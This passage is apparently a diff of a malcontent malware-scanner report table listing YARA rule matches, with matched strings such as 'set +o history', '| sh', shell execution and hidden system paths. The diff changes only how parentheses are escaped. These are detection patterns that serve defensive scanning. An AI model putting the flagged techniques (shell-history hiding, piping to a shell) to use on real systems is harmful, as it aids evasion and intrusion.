AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAD%2FgwAyAAAAAQAAAAAAAAAAAAAAAAAAAAABAAQEAAEBAQJYAAEBASH4DwD4GwHEAvgcA%2FgXBIwMAYuL%2Bnz5tQXkD5j3CBLnEQACAQEBIVhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYAAABAQAADwACAQEEE%2Ft3Dov6fAH6fAT%2BfPp8%2BnwHDosMCvm1Cvm1DAz6fBQAAAAAAAABAAAAAMmJbzEAAAAAzgTjFQAAAADOBOQpAAEAAAAAAAAADAAUAAQAAAABAAAAAgABAAAAAAAAAAAD6AAAAAAAAA%3D%3D%22&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Ca+href%3E&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+ parseInt(](https://github.com/search?q=%2B+parseInt%28&type=code)
[- parseInt(](https://github.com/search?q=-+parseInt%28&type=code)
[*parseInt(](https://github.com/search?q=%2AparseInt%28&type=code)
[+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code)
[-parseInt(](https://github.com/search?q=-parseInt%28&type=code) | -| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [(String.fromCharCode((a << 4](https://github.com/search?q=%28String.fromCharCode%28%28a+%3C%3C+4&type=code)
[(String.fromCharCode((a >> 8](https://github.com/search?q=%28String.fromCharCode%28%28a+%3E%3E+8&type=code)
[(String.fromCharCode((e >> (](https://github.com/search?q=%28String.fromCharCode%28%28e+%3E%3E+%28&type=code)
[(String.fromCharCode((t << 4](https://github.com/search?q=%28String.fromCharCode%28%28t+%3C%3C+4&type=code)
[(String.fromCharCode(160),"]](https://github.com/search?q=%28String.fromCharCode%28160%29%2C%22%5D&type=code)
[(String.fromCharCode(Sf(e)))](https://github.com/search?q=%28String.fromCharCode%28Sf%28e%29%29%29&type=code)
[(String.fromCharCode(a))||(i](https://github.com/search?q=%28String.fromCharCode%28a%29%29%7C%7C%28i&type=code)
[(String.fromCharCode(c)):s.p](https://github.com/search?q=%28String.fromCharCode%28c%29%29%3As.p&type=code)
[(String.fromCharCode(code)))](https://github.com/search?q=%28String.fromCharCode%28code%29%29%29&type=code)
[(String.fromCharCode(code))\](https://github.com/search?q=%28String.fromCharCode%28code%29%29%5C&type=code)
[(String.fromCharCode(t)))?a:](https://github.com/search?q=%28String.fromCharCode%28t%29%29%29%3Fa%3A&type=code)
[(String.fromCharCode(t))?r:r](https://github.com/search?q=%28String.fromCharCode%28t%29%29%3Fr%3Ar&type=code)
[(String.fromCharCode(t))}}fu](https://github.com/search?q=%28String.fromCharCode%28t%29%29%7D%7Dfu&type=code)
[(String.fromCharCode(this.da](https://github.com/search?q=%28String.fromCharCode%28this.da&type=code)
[(String.fromCharCode.apply(n](https://github.com/search?q=%28String.fromCharCode.apply%28n&type=code)
[)}(r),o.fromCharCode.apply(o](https://github.com/search?q=%29%7D%28r%29%2Co.fromCharCode.apply%28o&type=code)
[+String.fromCharCode(this.bu](https://github.com/search?q=%2BString.fromCharCode%28this.bu&type=code)
[,String.fromCharCode(p>>24&2](https://github.com/search?q=%2CString.fromCharCode%28p%3E%3E24%262&type=code)
[,String.fromCharCode.apply(S](https://github.com/search?q=%2CString.fromCharCode.apply%28S&type=code)
[,String.fromCharCode.apply(n](https://github.com/search?q=%2CString.fromCharCode.apply%28n&type=code)
[:String.fromCharCode(A,e,r),](https://github.com/search?q=%3AString.fromCharCode%28A%2Ce%2Cr%29%2C&type=code)
[:String.fromCharCode(a)):\"k](https://github.com/search?q=%3AString.fromCharCode%28a%29%29%3A%5C%22k&type=code)
[:String.fromCharCode(e):"key](https://github.com/search?q=%3AString.fromCharCode%28e%29%3A%22key&type=code)
[:String.fromCharCode(n)}cons](https://github.com/search?q=%3AString.fromCharCode%28n%29%7Dcons&type=code)
[=String.fromCharCode("0x"+(t](https://github.com/search?q=%3DString.fromCharCode%28%220x%22%2B%28t&type=code)
[=String.fromCharCode((15&n)<](https://github.com/search?q=%3DString.fromCharCode%28%2815%26n%29%3C&type=code)
[=String.fromCharCode((31&n)<](https://github.com/search?q=%3DString.fromCharCode%28%2831%26n%29%3C&type=code)
[=String.fromCharCode(160),Rn](https://github.com/search?q=%3DString.fromCharCode%28160%29%2CRn&type=code)
[=String.fromCharCode(32),fe=](https://github.com/search?q=%3DString.fromCharCode%2832%29%2Cfe%3D&type=code)
[=String.fromCharCode(32),jn=](https://github.com/search?q=%3DString.fromCharCode%2832%29%2Cjn%3D&type=code)
[=String.fromCharCode(\"0x\"+](https://github.com/search?q=%3DString.fromCharCode%28%5C%220x%5C%22%2B&type=code)
[=String.fromCharCode(a));els](https://github.com/search?q=%3DString.fromCharCode%28a%29%29%3Bels&type=code)
[=String.fromCharCode(a);i&&(](https://github.com/search?q=%3DString.fromCharCode%28a%29%3Bi%26%26%28&type=code)
[=String.fromCharCode(a)}o=-2](https://github.com/search?q=%3DString.fromCharCode%28a%29%7Do%3D-2&type=code)
[=String.fromCharCode(a,t),o=](https://github.com/search?q=%3DString.fromCharCode%28a%2Ct%29%2Co%3D&type=code)
[=String.fromCharCode(e),t};v](https://github.com/search?q=%3DString.fromCharCode%28e%29%2Ct%7D%3Bv&type=code)
[=String.fromCharCode(e);if(q](https://github.com/search?q=%3DString.fromCharCode%28e%29%3Bif%28q&type=code)
[=String.fromCharCode(e>>>10&](https://github.com/search?q=%3DString.fromCharCode%28e%3E%3E%3E10%26&type=code)
[=String.fromCharCode(n);brea](https://github.com/search?q=%3DString.fromCharCode%28n%29%3Bbrea&type=code)
[=String.fromCharCode(o[a]);v](https://github.com/search?q=%3DString.fromCharCode%28o%5Ba%5D%29%3Bv&type=code)
[=String.fromCharCode(r),r=e,](https://github.com/search?q=%3DString.fromCharCode%28r%29%2Cr%3De%2C&type=code)
[=String.fromCharCode(s),m):n](https://github.com/search?q=%3DString.fromCharCode%28s%29%2Cm%29%3An&type=code)
[=String.fromCharCode(s[c]);v](https://github.com/search?q=%3DString.fromCharCode%28s%5Bc%5D%29%3Bv&type=code)
[=String.fromCharCode(t),R):C](https://github.com/search?q=%3DString.fromCharCode%28t%29%2CR%29%3AC&type=code)
[=String.fromCharCode(t),m):n](https://github.com/search?q=%3DString.fromCharCode%28t%29%2Cm%29%3An&type=code)
[=String.fromCharCode(this.bu](https://github.com/search?q=%3DString.fromCharCode%28this.bu&type=code)
[=String.fromCharCode(this.re](https://github.com/search?q=%3DString.fromCharCode%28this.re&type=code)
[=String.fromCharCode,A=0;A<2](https://github.com/search?q=%3DString.fromCharCode%2CA%3D0%3BA%3C2&type=code)
[=String.fromCharCode,pE=["",](https://github.com/search?q=%3DString.fromCharCode%2CpE%3D%5B%22%22%2C&type=code)
[=String.fromCharCode.apply(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;for(i=0](https://github.com/search?q=%3DString.fromCharCode%3Bfor%28i%3D0&type=code)
[?String.fromCharCode(A):64==](https://github.com/search?q=%3FString.fromCharCode%28A%29%3A64%3D%3D&type=code)
[?String.fromCharCode(A,e):St](https://github.com/search?q=%3FString.fromCharCode%28A%2Ce%29%3ASt&type=code)
[?String.fromCharCode(A[i.cha](https://github.com/search?q=%3FString.fromCharCode%28A%5Bi.cha&type=code)
[Point","fromCharCode","u","U](https://github.com/search?q=Point%22%2C%22fromCharCode%22%2C%22u%22%2C%22U&type=code)
[[String.fromCharCode(65279),](https://github.com/search?q=%5BString.fromCharCode%2865279%29%2C&type=code)
[`String.fromCharCode(Number.](https://github.com/search?q=%60String.fromCharCode%28Number.&type=code)
[regex","fromCharCode","facto](https://github.com/search?q=regex%22%2C%22fromCharCode%22%2C%22facto&type=code)
[tring","fromCharCode","strBu](https://github.com/search?q=tring%22%2C%22fromCharCode%22%2C%22strBu&type=code)
[{String.fromCharCode(e)} (ch](https://github.com/search?q=%7BString.fromCharCode%28e%29%7D+%28ch&type=code)
[{String.fromCharCode(e)}) in](https://github.com/search?q=%7BString.fromCharCode%28e%29%7D%29+in&type=code)
[(String.fromCharCode(t, i),](https://github.com/search?q=%28String.fromCharCode%28t%2C+i%29%2C&type=code)
[String.fromCharCode((e >> 8](https://github.com/search?q=String.fromCharCode%28%28e+%3E%3E+8&type=code)
[String.fromCharCode(...e.su](https://github.com/search?q=String.fromCharCode%28...e.su&type=code)
[String.fromCharCode(160);\n](https://github.com/search?q=String.fromCharCode%28160%29%3B%5Cn&type=code)
[String.fromCharCode(255 & a](https://github.com/search?q=String.fromCharCode%28255+%26+a&type=code)
[String.fromCharCode(\n (](https://github.com/search?q=String.fromCharCode%28%5Cn++++%28&type=code)
[String.fromCharCode(b.which](https://github.com/search?q=String.fromCharCode%28b.which&type=code)
[String.fromCharCode(chunk)\](https://github.com/search?q=String.fromCharCode%28chunk%29%5C&type=code)
[String.fromCharCode(code) :](https://github.com/search?q=String.fromCharCode%28code%29+%3A&type=code)
[String.fromCharCode(code)\n](https://github.com/search?q=String.fromCharCode%28code%29%5Cn&type=code)
[String.fromCharCode(code, n](https://github.com/search?q=String.fromCharCode%28code%2C+n&type=code)
[String.fromCharCode(e+(e>25](https://github.com/search?q=String.fromCharCode%28e%2B%28e%3E25&type=code)
[String.fromCharCode(e.fixed](https://github.com/search?q=String.fromCharCode%28e.fixed&type=code)
[String.fromCharCode(e[0], e](https://github.com/search?q=String.fromCharCode%28e%5B0%5D%2C+e&type=code)
[String.fromCharCode(i).repe](https://github.com/search?q=String.fromCharCode%28i%29.repe&type=code)
[String.fromCharCode(i.charC](https://github.com/search?q=String.fromCharCode%28i.charC&type=code)
[String.fromCharCode(i.glyph](https://github.com/search?q=String.fromCharCode%28i.glyph&type=code)
[String.fromCharCode(parseIn](https://github.com/search?q=String.fromCharCode%28parseIn&type=code)
[String.fromCharCode(r) : e.](https://github.com/search?q=String.fromCharCode%28r%29+%3A+e.&type=code)
[String.fromCharCode(t.getBy](https://github.com/search?q=String.fromCharCode%28t.getBy&type=code)
[String.fromCharCode(t.getUi](https://github.com/search?q=String.fromCharCode%28t.getUi&type=code)
[String.fromCharCode(t.which](https://github.com/search?q=String.fromCharCode%28t.which&type=code)
[String.fromCharCode.apply(v](https://github.com/search?q=String.fromCharCode.apply%28v&type=code)
[String.fromCharCode(((31 &](https://github.com/search?q=String.fromCharCode%28%28%2831+%26&type=code)
[String.fromCharCode(64 * t](https://github.com/search?q=String.fromCharCode%2864+%2A+t&type=code)
[String.fromCharCode(code +](https://github.com/search?q=String.fromCharCode%28code+%2B&type=code)
[String.fromCharCode(i) : i](https://github.com/search?q=String.fromCharCode%28i%29+%3A+i&type=code)
[String.fromCharCode(t + (a](https://github.com/search?q=String.fromCharCode%28t+%2B+%28a&type=code)
[String.fromCharCode(...n)](https://github.com/search?q=String.fromCharCode%28...n%29&type=code)
[String.fromCharCode(...t)](https://github.com/search?q=String.fromCharCode%28...t%29&type=code)
[String.fromCharCode(n[o])](https://github.com/search?q=String.fromCharCode%28n%5Bo%5D%29&type=code)
[(String.fromCharCode(e))](https://github.com/search?q=%28String.fromCharCode%28e%29%29&type=code)
[String.fromCharCode(g))](https://github.com/search?q=String.fromCharCode%28g%29%29&type=code)
[String.fromCharCode(i))](https://github.com/search?q=String.fromCharCode%28i%29%29&type=code)
[String.fromCharCode(r))](https://github.com/search?q=String.fromCharCode%28r%29%29&type=code) | +| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+ parseInt\(](https://github.com/search?q=%2B+parseInt%28&type=code)
[- parseInt\(](https://github.com/search?q=-+parseInt%28&type=code)
[*parseInt\(](https://github.com/search?q=%2AparseInt%28&type=code)
[+parseInt\(](https://github.com/search?q=%2BparseInt%28&type=code)
[-parseInt\(](https://github.com/search?q=-parseInt%28&type=code) | +| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [\(String.fromCharCode\(\(a << 4](https://github.com/search?q=%28String.fromCharCode%28%28a+%3C%3C+4&type=code)
[\(String.fromCharCode\(\(a >> 8](https://github.com/search?q=%28String.fromCharCode%28%28a+%3E%3E+8&type=code)
[\(String.fromCharCode\(\(e >> \(](https://github.com/search?q=%28String.fromCharCode%28%28e+%3E%3E+%28&type=code)
[\(String.fromCharCode\(\(t << 4](https://github.com/search?q=%28String.fromCharCode%28%28t+%3C%3C+4&type=code)
[\(String.fromCharCode\(160\),"\]](https://github.com/search?q=%28String.fromCharCode%28160%29%2C%22%5D&type=code)
[\(String.fromCharCode\(Sf\(e\)\)\)](https://github.com/search?q=%28String.fromCharCode%28Sf%28e%29%29%29&type=code)
[\(String.fromCharCode\(a\)\)||\(i](https://github.com/search?q=%28String.fromCharCode%28a%29%29%7C%7C%28i&type=code)
[\(String.fromCharCode\(c\)\):s.p](https://github.com/search?q=%28String.fromCharCode%28c%29%29%3As.p&type=code)
[\(String.fromCharCode\(code\)\)\)](https://github.com/search?q=%28String.fromCharCode%28code%29%29%29&type=code)
[\(String.fromCharCode\(code\)\)\](https://github.com/search?q=%28String.fromCharCode%28code%29%29%5C&type=code)
[\(String.fromCharCode\(t\)\)\)?a:](https://github.com/search?q=%28String.fromCharCode%28t%29%29%29%3Fa%3A&type=code)
[\(String.fromCharCode\(t\)\)?r:r](https://github.com/search?q=%28String.fromCharCode%28t%29%29%3Fr%3Ar&type=code)
[\(String.fromCharCode\(t\)\)}}fu](https://github.com/search?q=%28String.fromCharCode%28t%29%29%7D%7Dfu&type=code)
[\(String.fromCharCode\(this.da](https://github.com/search?q=%28String.fromCharCode%28this.da&type=code)
[\(String.fromCharCode.apply\(n](https://github.com/search?q=%28String.fromCharCode.apply%28n&type=code)
[\)}\(r\),o.fromCharCode.apply\(o](https://github.com/search?q=%29%7D%28r%29%2Co.fromCharCode.apply%28o&type=code)
[+String.fromCharCode\(this.bu](https://github.com/search?q=%2BString.fromCharCode%28this.bu&type=code)
[,String.fromCharCode\(p>>24&2](https://github.com/search?q=%2CString.fromCharCode%28p%3E%3E24%262&type=code)
[,String.fromCharCode.apply\(S](https://github.com/search?q=%2CString.fromCharCode.apply%28S&type=code)
[,String.fromCharCode.apply\(n](https://github.com/search?q=%2CString.fromCharCode.apply%28n&type=code)
[:String.fromCharCode\(A,e,r\),](https://github.com/search?q=%3AString.fromCharCode%28A%2Ce%2Cr%29%2C&type=code)
[:String.fromCharCode\(a\)\):\"k](https://github.com/search?q=%3AString.fromCharCode%28a%29%29%3A%5C%22k&type=code)
[:String.fromCharCode\(e\):"key](https://github.com/search?q=%3AString.fromCharCode%28e%29%3A%22key&type=code)
[:String.fromCharCode\(n\)}cons](https://github.com/search?q=%3AString.fromCharCode%28n%29%7Dcons&type=code)
[=String.fromCharCode\("0x"+\(t](https://github.com/search?q=%3DString.fromCharCode%28%220x%22%2B%28t&type=code)
[=String.fromCharCode\(\(15&n\)<](https://github.com/search?q=%3DString.fromCharCode%28%2815%26n%29%3C&type=code)
[=String.fromCharCode\(\(31&n\)<](https://github.com/search?q=%3DString.fromCharCode%28%2831%26n%29%3C&type=code)
[=String.fromCharCode\(160\),Rn](https://github.com/search?q=%3DString.fromCharCode%28160%29%2CRn&type=code)
[=String.fromCharCode\(32\),fe=](https://github.com/search?q=%3DString.fromCharCode%2832%29%2Cfe%3D&type=code)
[=String.fromCharCode\(32\),jn=](https://github.com/search?q=%3DString.fromCharCode%2832%29%2Cjn%3D&type=code)
[=String.fromCharCode\(\"0x\"+](https://github.com/search?q=%3DString.fromCharCode%28%5C%220x%5C%22%2B&type=code)
[=String.fromCharCode\(a\)\);els](https://github.com/search?q=%3DString.fromCharCode%28a%29%29%3Bels&type=code)
[=String.fromCharCode\(a\);i&&\(](https://github.com/search?q=%3DString.fromCharCode%28a%29%3Bi%26%26%28&type=code)
[=String.fromCharCode\(a\)}o=-2](https://github.com/search?q=%3DString.fromCharCode%28a%29%7Do%3D-2&type=code)
[=String.fromCharCode\(a,t\),o=](https://github.com/search?q=%3DString.fromCharCode%28a%2Ct%29%2Co%3D&type=code)
[=String.fromCharCode\(e\),t};v](https://github.com/search?q=%3DString.fromCharCode%28e%29%2Ct%7D%3Bv&type=code)
[=String.fromCharCode\(e\);if\(q](https://github.com/search?q=%3DString.fromCharCode%28e%29%3Bif%28q&type=code)
[=String.fromCharCode\(e>>>10&](https://github.com/search?q=%3DString.fromCharCode%28e%3E%3E%3E10%26&type=code)
[=String.fromCharCode\(n\);brea](https://github.com/search?q=%3DString.fromCharCode%28n%29%3Bbrea&type=code)
[=String.fromCharCode\(o\[a\]\);v](https://github.com/search?q=%3DString.fromCharCode%28o%5Ba%5D%29%3Bv&type=code)
[=String.fromCharCode\(r\),r=e,](https://github.com/search?q=%3DString.fromCharCode%28r%29%2Cr%3De%2C&type=code)
[=String.fromCharCode\(s\),m\):n](https://github.com/search?q=%3DString.fromCharCode%28s%29%2Cm%29%3An&type=code)
[=String.fromCharCode\(s\[c\]\);v](https://github.com/search?q=%3DString.fromCharCode%28s%5Bc%5D%29%3Bv&type=code)
[=String.fromCharCode\(t\),R\):C](https://github.com/search?q=%3DString.fromCharCode%28t%29%2CR%29%3AC&type=code)
[=String.fromCharCode\(t\),m\):n](https://github.com/search?q=%3DString.fromCharCode%28t%29%2Cm%29%3An&type=code)
[=String.fromCharCode\(this.bu](https://github.com/search?q=%3DString.fromCharCode%28this.bu&type=code)
[=String.fromCharCode\(this.re](https://github.com/search?q=%3DString.fromCharCode%28this.re&type=code)
[=String.fromCharCode,A=0;A<2](https://github.com/search?q=%3DString.fromCharCode%2CA%3D0%3BA%3C2&type=code)
[=String.fromCharCode,pE=\["",](https://github.com/search?q=%3DString.fromCharCode%2CpE%3D%5B%22%22%2C&type=code)
[=String.fromCharCode.apply\(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;for\(i=0](https://github.com/search?q=%3DString.fromCharCode%3Bfor%28i%3D0&type=code)
[?String.fromCharCode\(A\):64==](https://github.com/search?q=%3FString.fromCharCode%28A%29%3A64%3D%3D&type=code)
[?String.fromCharCode\(A,e\):St](https://github.com/search?q=%3FString.fromCharCode%28A%2Ce%29%3ASt&type=code)
[?String.fromCharCode\(A\[i.cha](https://github.com/search?q=%3FString.fromCharCode%28A%5Bi.cha&type=code)
[Point","fromCharCode","u","U](https://github.com/search?q=Point%22%2C%22fromCharCode%22%2C%22u%22%2C%22U&type=code)
[\[String.fromCharCode\(65279\),](https://github.com/search?q=%5BString.fromCharCode%2865279%29%2C&type=code)
[\`String.fromCharCode\(Number.](https://github.com/search?q=%60String.fromCharCode%28Number.&type=code)
[regex","fromCharCode","facto](https://github.com/search?q=regex%22%2C%22fromCharCode%22%2C%22facto&type=code)
[tring","fromCharCode","strBu](https://github.com/search?q=tring%22%2C%22fromCharCode%22%2C%22strBu&type=code)
[{String.fromCharCode\(e\)} \(ch](https://github.com/search?q=%7BString.fromCharCode%28e%29%7D+%28ch&type=code)
[{String.fromCharCode\(e\)}\) in](https://github.com/search?q=%7BString.fromCharCode%28e%29%7D%29+in&type=code)
[\(String.fromCharCode\(t, i\),](https://github.com/search?q=%28String.fromCharCode%28t%2C+i%29%2C&type=code)
[String.fromCharCode\(\(e >> 8](https://github.com/search?q=String.fromCharCode%28%28e+%3E%3E+8&type=code)
[String.fromCharCode\(...e.su](https://github.com/search?q=String.fromCharCode%28...e.su&type=code)
[String.fromCharCode\(160\);\n](https://github.com/search?q=String.fromCharCode%28160%29%3B%5Cn&type=code)
[String.fromCharCode\(255 & a](https://github.com/search?q=String.fromCharCode%28255+%26+a&type=code)
[String.fromCharCode\(\n \(](https://github.com/search?q=String.fromCharCode%28%5Cn++++%28&type=code)
[String.fromCharCode\(b.which](https://github.com/search?q=String.fromCharCode%28b.which&type=code)
[String.fromCharCode\(chunk\)\](https://github.com/search?q=String.fromCharCode%28chunk%29%5C&type=code)
[String.fromCharCode\(code\) :](https://github.com/search?q=String.fromCharCode%28code%29+%3A&type=code)
[String.fromCharCode\(code\)\n](https://github.com/search?q=String.fromCharCode%28code%29%5Cn&type=code)
[String.fromCharCode\(code, n](https://github.com/search?q=String.fromCharCode%28code%2C+n&type=code)
[String.fromCharCode\(e+\(e>25](https://github.com/search?q=String.fromCharCode%28e%2B%28e%3E25&type=code)
[String.fromCharCode\(e.fixed](https://github.com/search?q=String.fromCharCode%28e.fixed&type=code)
[String.fromCharCode\(e\[0\], e](https://github.com/search?q=String.fromCharCode%28e%5B0%5D%2C+e&type=code)
[String.fromCharCode\(i\).repe](https://github.com/search?q=String.fromCharCode%28i%29.repe&type=code)
[String.fromCharCode\(i.charC](https://github.com/search?q=String.fromCharCode%28i.charC&type=code)
[String.fromCharCode\(i.glyph](https://github.com/search?q=String.fromCharCode%28i.glyph&type=code)
[String.fromCharCode\(parseIn](https://github.com/search?q=String.fromCharCode%28parseIn&type=code)
[String.fromCharCode\(r\) : e.](https://github.com/search?q=String.fromCharCode%28r%29+%3A+e.&type=code)
[String.fromCharCode\(t.getBy](https://github.com/search?q=String.fromCharCode%28t.getBy&type=code)
[String.fromCharCode\(t.getUi](https://github.com/search?q=String.fromCharCode%28t.getUi&type=code)
[String.fromCharCode\(t.which](https://github.com/search?q=String.fromCharCode%28t.which&type=code)
[String.fromCharCode.apply\(v](https://github.com/search?q=String.fromCharCode.apply%28v&type=code)
[String.fromCharCode\(\(\(31 &](https://github.com/search?q=String.fromCharCode%28%28%2831+%26&type=code)
[String.fromCharCode\(64 * t](https://github.com/search?q=String.fromCharCode%2864+%2A+t&type=code)
[String.fromCharCode\(code +](https://github.com/search?q=String.fromCharCode%28code+%2B&type=code)
[String.fromCharCode\(i\) : i](https://github.com/search?q=String.fromCharCode%28i%29+%3A+i&type=code)
[String.fromCharCode\(t + \(a](https://github.com/search?q=String.fromCharCode%28t+%2B+%28a&type=code)
[String.fromCharCode\(...n\)](https://github.com/search?q=String.fromCharCode%28...n%29&type=code)
[String.fromCharCode\(...t\)](https://github.com/search?q=String.fromCharCode%28...t%29&type=code)
[String.fromCharCode\(n\[o\]\)](https://github.com/search?q=String.fromCharCode%28n%5Bo%5D%29&type=code)
[\(String.fromCharCode\(e\)\)](https://github.com/search?q=%28String.fromCharCode%28e%29%29&type=code)
[String.fromCharCode\(g\)\)](https://github.com/search?q=String.fromCharCode%28g%29%29&type=code)
[String.fromCharCode\(i\)\)](https://github.com/search?q=String.fromCharCode%28i%29%29&type=code)
[String.fromCharCode\(r\)\)](https://github.com/search?q=String.fromCharCode%28r%29%29&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [ifconfig](https://github.com/search?q=ifconfig&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat|nice|nl|node|no](https://github.com/search?q=netstat%7Cnice%7Cnl%7Cnode%7Cno&type=code)
[netstats](https://github.com/search?q=netstats&type=code) | @@ -41,7 +41,7 @@ | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | hidden path in a system directory | [/health/v59/readxlunsupported/.dockerenvgcs-tier](https://github.com/search?q=%2Fhealth%2Fv59%2Freadxlunsupported%2F.dockerenvgcs-tier&type=code)
[/lodash/lodash/blob/master/.internal](https://github.com/search?q=%2Flodash%2Flodash%2Fblob%2Fmaster%2F.internal&type=code)
[/run/.containerenvtotal](https://github.com/search?q=%2Frun%2F.containerenvtotal&type=code)
[/tmp/.trashDecomCopyDel](https://github.com/search?q=%2Ftmp%2F.trashDecomCopyDel&type=code)
[/imagewriter/.source](https://github.com/search?q=%2Fimagewriter%2F.source&type=code)
[/interactive/.source](https://github.com/search?q=%2Finteractive%2F.source&type=code)
[/home/build/.cache](https://github.com/search?q=%2Fhome%2Fbuild%2F.cache&type=code)
[/declare/.source](https://github.com/search?q=%2Fdeclare%2F.source&type=code)
[/dex/.well-known](https://github.com/search?q=%2Fdex%2F.well-known&type=code) | | MEDIUM | [evasion/logging/hide_shell_history](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/hide_shell_history.yara#hide_shell_history) | Hides shell command history | [set +o history](https://github.com/search?q=set+%2Bo+history&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [runShellCommandAsynchronously](https://github.com/search?q=runShellCommandAsynchronously&type=code)
[serviceRestartCommand](https://github.com/search?q=serviceRestartCommand&type=code)
[executeCommand](https://github.com/search?q=executeCommand&type=code)
[execCommand:](https://github.com/search?q=execCommand%3A&type=code)
[ExecCommand](https://github.com/search?q=ExecCommand&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#exec_cmd_run) | executes external programs | [\).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.\(*Cmd\).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | | MEDIUM | [exec/script/activex](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/activex.yara#ActiveXObject) | Create an ActiveX object | [ActiveXObject](https://github.com/search?q=ActiveXObject&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | ['bash'](https://github.com/search?q=%27bash%27&type=code) | | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | @@ -99,7 +99,7 @@ | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | MEDIUM | [sus/malicious](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/malicious.yara#malicious) | References 'malicious' | [bottleneck for malicious stuff](https://github.com/search?q=bottleneck+for+malicious+stuff&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [GenerateRandomBytesWithReader](https://github.com/search?q=GenerateRandomBytesWithReader&type=code)
[conditionalRandomFields](https://github.com/search?q=conditionalRandomFields&type=code)
[GetRandomStateWithHMAC](https://github.com/search?q=GetRandomStateWithHMAC&type=code)
[randomNumberGenerator](https://github.com/search?q=randomNumberGenerator&type=code)
[NewRandomPartitioner](https://github.com/search?q=NewRandomPartitioner&type=code)
[randomizeSeedBrokers](https://github.com/search?q=randomizeSeedBrokers&type=code)
[selectRandomWeighted](https://github.com/search?q=selectRandomWeighted&type=code)
[NewRandomFromReader](https://github.com/search?q=NewRandomFromReader&type=code)
[nonZeroRandomBytes](https://github.com/search?q=nonZeroRandomBytes&type=code)
[initialRandomSeed](https://github.com/search?q=initialRandomSeed&type=code)
[newRandomFromPool](https://github.com/search?q=newRandomFromPool&type=code)
[randomPartitioner](https://github.com/search?q=randomPartitioner&type=code)
[setParticleRandom](https://github.com/search?q=setParticleRandom&type=code)
[RandomCharString](https://github.com/search?q=RandomCharString&type=code)
[readRandomUint32](https://github.com/search?q=readRandomUint32&type=code)
[DES3RandomToKey](https://github.com/search?q=DES3RandomToKey&type=code)
[RandomizePrefix](https://github.com/search?q=RandomizePrefix&type=code)
[getRandomString](https://github.com/search?q=getRandomString&type=code)
[getRandomValues](https://github.com/search?q=getRandomValues&type=code)
[newRandomReader](https://github.com/search?q=newRandomReader&type=code)
[rand_getrandom](https://github.com/search?q=rand_getrandom&type=code)
[randomBoundary](https://github.com/search?q=randomBoundary&type=code)
[readTimeRandom](https://github.com/search?q=readTimeRandom&type=code)
[DeriveRandom](https://github.com/search?q=DeriveRandom&type=code)
[KernelRandom](https://github.com/search?q=KernelRandom&type=code)
[randomAccess](https://github.com/search?q=randomAccess&type=code)
